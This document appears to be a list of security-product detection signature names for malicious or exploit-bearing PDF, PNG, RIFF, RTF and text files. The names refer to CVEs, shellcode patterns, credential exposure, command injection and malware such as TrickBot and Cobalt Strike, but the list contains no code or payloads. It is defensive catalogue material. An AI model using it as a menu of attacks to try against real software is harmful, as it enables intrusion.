File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049
File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149
File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155
File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157
File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159
File-PDF_Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3057
File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3059
File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3014
File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3057
File-PDF_BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
File-PDF_Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error
File-PDF_Conflicting-Content-Type-Text
File-PDF_Conflicting-Content-Type-Text-HTML
File-PDF_Conflicting-Content-Type-Text-Plain
File-PDF_Cool-PDF-Image-Stream-Buffer-Overflow
File-PDF_Coolpdf-Reader-CVE-2012-4914
File-PDF_Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow
File-PDF_Docm-File-And-JavaScript-In-PDF
File-PDF_EICAR-AntiVirus-Test
File-PDF_Embedded-Adobe-Flash
File-PDF_Embedded-Zip-Archive
File-PDF_Encoded-JavaScript-Tag-In-PDF
File-PDF_Encoded-Stream-Filter-Name-In-PDF
File-PDF_Foxit-PDF-JavaScript-Xfa-User-After-Free
File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free
File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free
File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free
File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free
File-PDF_Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution
File-PDF_Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free
File-PDF_Foxit-Phantompdf-Text-Field-Object-Use-After-Free
File-PDF_Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service
File-PDF_Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free
File-PDF_Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion
File-PDF_Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free
File-PDF_Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure
File-PDF_Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection
File-PDF_Foxit-Reader-Annotation-Delay-Use-After-Free
File-PDF_Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free
File-PDF_Foxit-Reader-Annotations-NoteIcon-Use-After-Free
File-PDF_Foxit-Reader-Annotations-Point-Use-After-Free
File-PDF_Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow
File-PDF_Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free
File-PDF_Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free
File-PDF_Foxit-Reader-JavaScript-MailForm-Use-After-Free
File-PDF_Foxit-Reader-JavaScript-popUpMenu-Use-After-Free
File-PDF_Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow
File-PDF_HTTP-Transfer-Over-Nonstandard-Port
File-PDF_JavaScript-Eval-Obfuscation-Method
File-PDF_JavaScript-In-PDF
File-PDF_JavaScript-Packed-Obfuscation-Method
File-PDF_JavaScript-Suspicious-Variable-Name
File-PDF_JavaScript-Unescape-Obfuscation-Method-2
File-PDF_JavaScript-With-Open-Action-In-PDF
File-PDF_JavaScript-With-Unescape-In-PDF
File-PDF_Launch-Command-In-PDF
File-PDF_Log4j-Remote-Code-Execution
File-PDF_Malicious-JavaScript-In-PDF
File-PDF_Malicious-JavaScript-In-PDF-2
File-PDF_Microsoft-Edge-CVE-2017-0023
File-PDF_Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464
File-PDF_Microsoft-Windows-PDF-Library-Code-Execution
File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution
File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption
File-PDF_Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow
File-PDF_Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure
File-PDF_Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379
File-PDF_Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution
File-PDF_Multiple-Stream-Filters-Obfuscation
File-PDF_Multiple-Vendor-PDF-Reader-Catlog-Handling
File-PDF_Negative-Image-Dimension
File-PDF_Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow
File-PDF_Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow
File-PDF_Nitro-Pro-PDF-Nested-Pages-Use-After-Free
File-PDF_Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow
File-PDF_Nitro-Pro-PDF-Pattern-Object-Integer-Overflow
File-PDF_NTLM-Credentials-Exposure
File-PDF_OLE-Header-In-PDF-File
File-PDF_Pdfium-Heap-Buffer-Overflow-Vulnerability
File-PDF_Shared-Variables
File-PDF_Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow
File-PDF_Suspected-Jaff-Ransomware-PDF
File-PDF_Suspected-TrickBot-Trojan-PDF
File-PDF_Suspicious-File
File-PDF_Suspicious-HTTP-Transfer-Over-Nonstandard-Port
File-PDF_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3201
File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3215
File-PDF_Windows-PDF-Library-CVE-2016-3370
File-PDF_Windows-PDF-Remote-Code-Execution-CVE-2016-3203
File-PDF_Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
File-PDF_x86-X41nop-Shellcode
File-PDF_x86-X90nop-Shellcode
File-PDF_Xpdf-Splash-Drawimage-Integer-Overflow
File-PNG_Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow
File-PNG_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
File-PNG_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-PNG_Conflicting-Content-Type-Text
File-PNG_Conflicting-Content-Type-Text-HTML
File-PNG_Conflicting-Content-Type-Text-Plain
File-PNG_EICAR-AntiVirus-Test
File-PNG_Embedded-Zip-Archive
File-PNG_Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow
File-PNG_HTML-Inside-PNG-File
File-PNG_Imagemagick-PNG-Text-Profile-Arbitrary-File-Read
File-PNG_Imagemagick-PNG-Text-Profile-Denial-Of-Service
File-PNG_Libpng-PNG-Decompress-Chunk-Integer-Overflow
File-PNG_Libpng-PNG-Image-BOF
File-PNG_Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080
File-PNG_Microsoft-Multiple-Products-Buffer-Overflow
File-PNG_Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
File-PNG_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-PNG_Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
File-PNG_PHP-Payloads-Injected-In-PNG-Image
File-PNG_PNG-Image-With-Excessively-Large-Height-Or-Width-Value
File-PNG_PNG-Image-With-Large-Data-Length-Value
File-PNG_PNG-Image-With-Large-Height-Or-Width-Value
File-PNG_Script-After-IEND-Chunk
File-PNG_Script-Inside-PNG-File
File-PNG_Shared-Variables
File-PNG_SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952
File-PNG_Suspicious-File
File-PNG_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-RIFF_4xm-Download
File-RIFF_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-RIFF_Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
File-RIFF_Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Termination-Memory-Corruption
File-RIFF_Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
File-RIFF_Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
File-RIFF_Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
File-RIFF_Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Vulnerability
File-RIFF_Adobe-Shockwave-Player-rcsL-Corruption
File-RIFF_Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
File-RIFF_Ani-Download
File-RIFF_Ani-Windows-Animationheader-Length-Buffer-Overflow
File-RIFF_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
File-RIFF_AVI-Download
File-RIFF_Conflicting-Content-Type-Text
File-RIFF_Conflicting-Content-Type-Text-HTML
File-RIFF_Conflicting-Content-Type-Text-Plain
File-RIFF_Corel-Draw-Image-Download
File-RIFF_Download
File-RIFF_EICAR-AntiVirus-Test
File-RIFF_Embedded-Zip-Archive
File-RIFF_FFmpeg-4xm-Processing-Memory-Corruption
File-RIFF_Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
File-RIFF_Microsoft-DirectShow-Heap-Overflow
File-RIFF_Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
File-RIFF_Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
File-RIFF_Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
File-RIFF_Microsoft-Windows-AVI-DirectX-DirectShow-AVI-Strn-Buffer-Overflow
File-RIFF_Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
File-RIFF_Microsoft-Windows-AVI-MS09-038
File-RIFF_Microsoft-Windows-AVI-MS09-038-2
File-RIFF_Microsoft-Windows-Cinepak-Codec-Code-Execution
File-RIFF_Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
File-RIFF_Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow
File-RIFF_Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow
File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow
File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow
File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2
File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
File-RIFF_QLCM-Download
File-RIFF_RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow
File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow
File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow-Over-SMTP
File-RIFF_RealPlayer-AVI-Parsing-Buffer-Overflow
File-RIFF_RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
File-RIFF_RIFFX-Download
File-RIFF_Shared-Variables
File-RIFF_Small-AVI-Container
File-RIFF_Synthetic-Test-Fingeprint-Attack-Related-Anomalies
File-RIFF_Synthetic-Test-Fingeprint-Botnet
File-RIFF_Synthetic-Test-Fingeprint-Compromise
File-RIFF_Synthetic-Test-Fingeprint-Denial-of-Service
File-RIFF_Synthetic-Test-Fingeprint-Disclosure
File-RIFF_Synthetic-Test-Fingeprint-Other-Suspicious-Traffic
File-RIFF_Synthetic-Test-Fingeprint-Potential-Botnet
File-RIFF_Synthetic-Test-Fingeprint-Potential-Compromise
File-RIFF_Synthetic-Test-Fingeprint-Potential-Denial-of-Service
File-RIFF_Synthetic-Test-Fingeprint-Potential-Disclosure
File-RIFF_Synthetic-Test-Fingeprint-Potential-Probe
File-RIFF_Synthetic-Test-Fingeprint-Probe
File-RIFF_Synthetic-Test-Fingeprint-Protocol-Violations
File-RIFF_Synthetic-Test-Fingeprint-Spyware-Malware-and-Adware
File-RIFF_Synthetic-Test-Fingeprint-Successful-Attacks
File-RIFF_Synthetic-Test-Fingeprint-Suspected-Attack-Related-Anomalies
File-RIFF_Synthetic-Test-Fingeprint-Suspected-Botnet
File-RIFF_Synthetic-Test-Fingeprint-Suspected-Compromise
File-RIFF_Synthetic-Test-Fingeprint-Suspected-Denial-of-Service
File-RIFF_Synthetic-Test-Fingeprint-Suspected-Disclosure
File-RIFF_Synthetic-Test-Fingeprint-Suspected-Probe
File-RIFF_VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
File-RIFF_WAVE-Download
File-RIFF_Wordpress-Core-External-Entity-Injection
File-RTF_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-RTF_Conflicting-Content-Type-Text
File-RTF_Conflicting-Content-Type-Text-HTML
File-RTF_Conflicting-Content-Type-Text-Plain
File-RTF_Conflicting-Content-Type-Word-Doc
File-RTF_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-RTF_EICAR-AntiVirus-Test
File-RTF_Embedded-Zip-Archive
File-RTF_Embedded-Zip-File
File-RTF_LibreOffice-RTF-Parser-Use-After-Free
File-RTF_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-RTF_Microsoft-ActiveX-Code-Execution-CVE-2012-0158
File-RTF_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
File-RTF_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-RTF_Microsoft-Office-CVE-2016-0021
File-RTF_Microsoft-Office-CVE-2016-3234-Information-Disclosure
File-RTF_Microsoft-Office-CVE-2016-3317
File-RTF_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
File-RTF_Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow
File-RTF_Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow
File-RTF_Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234
File-RTF_Microsoft-Office-Memory-Corruption-CVE-2015-0086
File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0022
File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0052
File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0053
File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-3280
File-RTF_Microsoft-Office-RCE-CVE-2017-0199
File-RTF_Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
File-RTF_Microsoft-Office-Suspicious-Ddeauto-Command
File-RTF_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-RTF_Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298
File-RTF_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
File-RTF_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-RTF_Microsoft-Windows-CVE-2017-0042
File-RTF_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
File-RTF_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
File-RTF_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
File-RTF_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
File-RTF_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015
File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-RTF_Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
File-RTF_Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Overflow
File-RTF_Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716
File-RTF_Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow
File-RTF_Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
File-RTF_Microsoft-Word-RTF-Mismatch-CVE-2012-0183
File-RTF_Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
File-RTF_Microsoft-Word-RTF-Object-Parsing-Memory-Corruption
File-RTF_Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
File-RTF_Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
File-RTF_Microsoft-Word-RTF-Parsing-Stack-Exhaustion
File-RTF_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS
File-RTF_Microsoft-WordPad-Embedded-COM-Code-Execution
File-RTF_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
File-RTF_RTF-File-Listid-Use-After-Free-Vulnerability
File-RTF_Shared-Variables
File-RTF_Suspicious-File
File-RTF_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-RTF_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-TextId_.NET-Framework-Stack-Overflow-Denial-of-Service-CVE-2016-0033
File-TextId_ACDSee-Products-XPM-Values-Section-Buffer-Overflow
File-TextId_ACDSee-XBM-Header-Name-Buffer-Overflow
File-TextId_ACDSee-XPM-File-Handling-Buffer-Overflow
File-TextId_Acrobat-Reader-eBook-Plug-In-Format-String
File-TextId_ActiveX-WScript-Shell-Call
File-TextId_Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
File-TextId_Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write
File-TextId_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
File-TextId_Adobe-Download-Manager-Buffer-Overflow
File-TextId_Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
File-TextId_Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication
File-TextId_Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution
File-TextId_Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow
File-TextId_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-TextId_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
File-TextId_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow
File-TextId_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
File-TextId_Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution
File-TextId_Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution
File-TextId_Apache-Axis-Soap-Array-Exhaustion
File-TextId_Apache-Axis-Soap-Web-Services-Denial-Of-Service
File-TextId_Apache-Camel-XSLT-Component-Java-Code-Execution
File-TextId_Apache-Log4j-JDBC-Appender-JNDI-Injection
File-TextId_Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization
File-TextId_Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization
File-TextId_Apache-Ofbiz-XmlRpc-Insecure-Deserialization
File-TextId_Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure
File-TextId_Apache-Subversion-SVN-SSH-Url-Command-Execution
File-TextId_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
File-TextId_Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow
File-TextId_Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
File-TextId_Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow
File-TextId_Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783
File-TextId_Apple-QuickTime-Plug-In-Security-Bypass
File-TextId_Apple-QuickTime-RTSP-URI-Buffer-Overflow
File-TextId_Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
File-TextId_Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow
File-TextId_Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF
File-TextId_Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption
File-TextId_Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow
File-TextId_Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow
File-TextId_Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption
File-TextId_Apple-Safari-XML-Parser-Infinite-Recursion-DoS
File-TextId_Apple-Software-Update-Remote-Command-Execution
File-TextId_Arcserve-UDP-Authentication-Bypass-CVE-2023-26258
File-TextId_Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service
File-TextId_Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure
File-TextId_Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload
File-TextId_Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
File-TextId_Barracuda-ESG-Parameter-Injection-CVE-2023-7102
File-TextId_Belkin-Wemo-UPnP-RCE-CVE-2018-6692
File-TextId_BitTorrent-Torrent-Metainfo-File
File-TextId_BitTorrent-Tracker-Response
File-TextId_CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection
File-TextId_Chamilo-Remote-Command-Execution-CVE-2023-34960
File-TextId_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction
File-TextId_Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101
File-TextId_Cisco-Data-Center-Network-Manager-Importts-Command-Injection
File-TextId_Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal
File-TextId_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
File-TextId_Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
File-TextId_Cisco-Remote-Access-VPN-Login-Failure
File-TextId_Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
File-TextId_Citrix-Program-Neighborhood-Agent-Buffer-Overflow
File-TextId_ClearSCADA-DBServer-Denial-Of-Service
File-TextId_Cobalt-Strike-Injector-File
File-TextId_Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
File-TextId_D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability
File-TextId_D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability
File-TextId_D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability
File-TextId_D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection
File-TextId_Disk-Pulse-Enterprise-Server-Client-Component-XML-Buffer-Overflow
File-TextId_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-TextId_Document-Template-Injection
File-TextId_Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure
File-TextId_Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service
File-TextId_EICAR-AntiVirus-Test
File-TextId_Electronic-Arts-Origin-Client-URI-Handler-Template-Injection
File-TextId_Embedded-Zip-Archive
File-TextId_Evernote-For-Mac-Embedded-Link-Directory-Traversal
File-TextId_Firefox-Browser-XUL-Frame-Tree-Memory-Corruption
File-TextId_Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption
File-TextId_Firefox-SVG-JavaScript-Zoom-Memory-Corruption
File-TextId_Flash-Embedded-Office-Document
File-TextId_Flexense-DiskPulse-Stack-Buffer-Overflow
File-TextId_Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
File-TextId_Ghostscript-File-Command-Execution
File-TextId_Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-TextId_GLPI-Computervirtualmachine-SQL-Injection
File-TextId_GLPI-Inventory-Agent-SQL-Injection
File-TextId_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
File-TextId_GnuPG-Message-Packet-Length-Handling-Integer-Overflow
File-TextId_Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free
File-TextId_Google-Chrome-Multiple-File-Type-Security-Bypass
File-TextId_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
File-TextId_Hex-Encoded-Script-Data-Content
File-TextId_Hikvision-Command-Injection-CVE-2021-36260
File-TextId_HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal
File-TextId_HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675
File-TextId_IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow
File-TextId_IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
File-TextId_IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution
File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution-2
File-TextId_Imagemagick-Authenticate-Command-Injection
File-TextId_Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection
File-TextId_Imagemagick-Shell-Character-Filtering-Code-Execution
File-TextId_Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization
File-TextId_Inductive-Automation-Ignition-Base64element-Insecure-Deserialization
File-TextId_Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization
File-TextId_Inductive-Automation-Ignition-runQuery-Insecure-Deserialization
File-TextId_Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow
File-TextId_Internet-Explorer-Memory-Corruption-CVE-2018-8249
File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619
File-TextId_Internet-Explorer-Use-After-Free-CVE-2013-3118
File-TextId_Internet-Shortcut-File-MHTML-URL-Prefix
File-TextId_Internet-Shortcut-File-Transfer
File-TextId_Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection
File-TextId_Ivanti-Connect-Remote-Code-Execution-Chain-CVE-2024-21893-CVE-2024-21887
File-TextId_Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
File-TextId_Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal
File-TextId_Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal
File-TextId_Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection
File-TextId_Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection
File-TextId_Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection
File-TextId_Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection
File-TextId_Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection
File-TextId_Java-Web-Start
File-TextId_Java-Web-Start-Jnlp-File-Argument-Injection
File-TextId_JavaScript-In-SMIL-XSS
File-TextId_Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection
File-TextId_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
File-TextId_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
File-TextId_LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow
File-TextId_LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425
File-TextId_LibreOffice-Librelogo-Arbitrary-Code-Execution
File-TextId_LibreOffice-Macro-Event-Remote-Code-Execution
File-TextId_LibreOffice-Webservice-Information-Disclosure
File-TextId_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
File-TextId_MacOS-Suspicious-Shortcut-File
File-TextId_Magento-API-Unserialize-Remote-Code-Execution
File-TextId_Malicious-Internet-Shortcut-File
File-TextId_Microsoft-.NET-And-Oracle-Java-SE-Xml-Digital-Signature-Spoofing
File-TextId_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-TextId_Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015
File-TextId_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
File-TextId_Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution
File-TextId_Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow
File-TextId_Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass
File-TextId_Microsoft-Direct2d-SVG-Path-Memory-Corruption
File-TextId_Microsoft-DirectX-Sami-File-Parsing-Code-Execution
File-TextId_Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
File-TextId_Microsoft-Excel-2002-XML-Document
File-TextId_Microsoft-Excel-2013-Workbook
File-TextId_Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
File-TextId_Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass
File-TextId_Microsoft-Excel-File-Importing-Code-Execution
File-TextId_Microsoft-Excel-Rept-Function-Integer-Overflow
